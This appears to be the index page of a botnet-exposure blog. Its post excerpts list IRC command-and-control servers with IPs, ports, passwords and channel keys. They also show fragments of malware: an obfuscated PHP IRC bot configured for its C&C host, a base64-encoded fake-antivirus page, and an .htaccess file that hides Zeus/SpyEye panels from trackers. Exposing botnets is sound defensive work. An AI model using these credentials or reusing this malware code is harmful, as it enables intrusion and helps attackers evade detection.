Another post from our anonymous friend Resolved : [4thdemo.com] To [199.19.105.123] server port password channel 4thdemo.com:3344 785chelsea #Insomnia 4thdemo.com:5443 alexandre69 #Channel Password 4thdemo.com:6667 r3m0hdemoni #Insomnia r3de07, #Jamie 4thdemo.com:9891 modrica1x1 #MasterBl4ster modricha1x1, #lolba, #Cro4t, #fric All are seperate irc servers, but hosted on the same server. Some HF hecker selling to skids. Oh, its DeMoNi *Read more...
insomnia.incorporatedhosting.info(Insomnia bot hosted in United Kingdom Ovh Systems)
This botnet is found by our anonymous friend here all credits go to him for this Server Port insomnia.incorporatedhosting.info:5656 Channel: #insomnia k6geyzs Botnet owner: Digital from HF and friends Here Lilyjade extension named Ad Killer Pro (found from our anonymous friend) //New Lilyjade extension //Named: Ad Killer Pro //CrosRider #:4995 //Panel: http://nemsmedia.cloudapp.net //Extension appAPI.ready(function($) {Read more...
Anti ZS spyeyes Tracker .htaccess
Criminals now are forced to find diferent methods to protect malwares like zeus or spyeye from being traced and exposed This is one of them: ############################ #Anti ZS spyeyes Tracker .htaccess # #84.74.14?.* # ############################ RewriteEngine on RewriteCond %{HTTP_REFERER} ^http://.*google.com [NC] RewriteRule .* - [F] ########################################### #Spider Blocker/Crawler/Bot's # ########################################### Order Deny,Allow Deny from 82.165.47.*Read more...
Remember h1t3m?lol
Some of u heckers prob remember h1t3m the australian guy who got caught and send to prison for infecting like 3k people i found some nice logs and as u can see it was not so hard to find him he even tell his real name to buyers who wanted to buy his spack haveRead more...
xlaazer.no-ip.info(irc botnet hosted in United States Goose Creek Comcast Cable Communications Inc)
Resolved : [xlaazer.no-ip.info] To [76.23.217.80] Remote Host Port Number xlaazer.no-ip.info 8080 PASS none Clients: I have 91 clients and 0 servers Local users: Current Local Users: 91 Max: 1522 Global users: Current Global Users: 91 Max: 296 i dont have the exe file to find channels hosting infos: http://whois.domaintools.com/76.23.217.80
b4nb1n0.dyndns.tv(ngrBot hosted in Spain Ovh Systems)
Domains used for controlling the botnet b4nb1n0.dyndns.tv active d11.dyndns.tv 0csf15.dyndns.tv Resolved : [b4nb1n0.dyndns.tv] To [178.33.116.27] server: b4nb1n0.dyndns.tv PASS b4nb1 Local users: Current Local Users: 82 Max: 92 Global users: Current Global Users: 82 Max: 92 NICK n{USA|XPa}hrczwsa USER hrczwsa 0 0 :hrczwsa JOIN #hola juli26 Now talking in #hola Modes On: [ #hola ] [Read more...
Fake Antivirus Example
html file is encrypted u have to decrypt the encrypted(base64) part if u want to have more from this malware open the html file in sandboxie to see what it does virtest.html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head> <title>Wait a minute! This is important - we check your devices.</title> <meta http-equiv="Content-Type" content="text/html;Read more...
91.121.171.64(irc botnet hosted in France Ovh Systems)
ip:port 91.121.171.64:9040 nick xUVEuwU user cjfsiemx channel #j channel #c channel #m Now talking in #j Topic On: [ #j ] [ =KN4iPk89Ohci3Sn1FY5LY8datYLj+i4PAPQuBzYYTyPX97LYmPrRD9RhXU0Gj5Kp5qfZU6LVVw90Ax ] Topic By: [ y ] Now talking in #c Topic On: [ #c ] [ =qZw7/pkZ+h/Oi7VdGwYNa63Gdfp77grj2Awm4eqQ+xsz+tuggMYRZyQXWSVqN+7dBpeSdeEvC1MRGecRP2XBE8Vh/Xl ] Topic By: [ y ] UPDATE: 91.121.171.64:4676 Now talking in #balengor Topic On: [Read more...
sssssss.devhoster.com(irc botnet hosted in China Beijing Chinanet Hunan Province Network)
Remote Host Port Number sssssss.devhoster.com 6971 PASS laorosr UPDATE: Remote Host Port Number sssssss.devhoster.com 4030 PASS eee sssssss.devhoster.com 5060 PASS eee NICK kmmmxji USER ygrjllh “” “hkw” :ygrjllh for more look here http://www.exposedbotnets.com/search?q=PASS+laorosr hosting infos: http://whois.domaintools.com/175.6.1.159
gang.sexpil.net(Linux bots hosted in United States Truckee Softcom America Inc)
Another bot from Tijn Resolved : [gang.sexpil.net] To [216.224.184.101] <?php @set_time_limit(0); @error_reporting(0); class HbZheTqekEkqwtqTQ { var $ttwtzTtWQWwhzbN = array("BbWEWnHeTTwqnNhb"=>"gang.sexpil.net", "eBwz"=>"23232", "ZnQWe"=>"scary", "KqkktZ"=>"13", "KtWqnhZ"=>"#wWw#", "tZQ"=>"scan", "NneBweEZz"=>"41aa15390e2efa34ac693c3bd7cb8e88", "eWNTTTEhbQ"=>".", "BbzWWQkbNBb"=>"a87710e60dee7645081a8fc2fab74dbd"); var $users = array(); /* txZET4EZRnuKkWrlW8MjP0M46fREwjEPHtjqoOf51zFbmWn9VZiBQVvM0chmmL2T5c9jQffIFLK */ function yySydpvYj($host) { $this->users[$host] = true; } function SjSpsYm($msg) { fwrite($this->rIiuOioIR,"$msgrn"); } function aGGAJSAgavgjADGa() { $chars = 'abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ-0123456789'; $size = strlen($chars);Read more...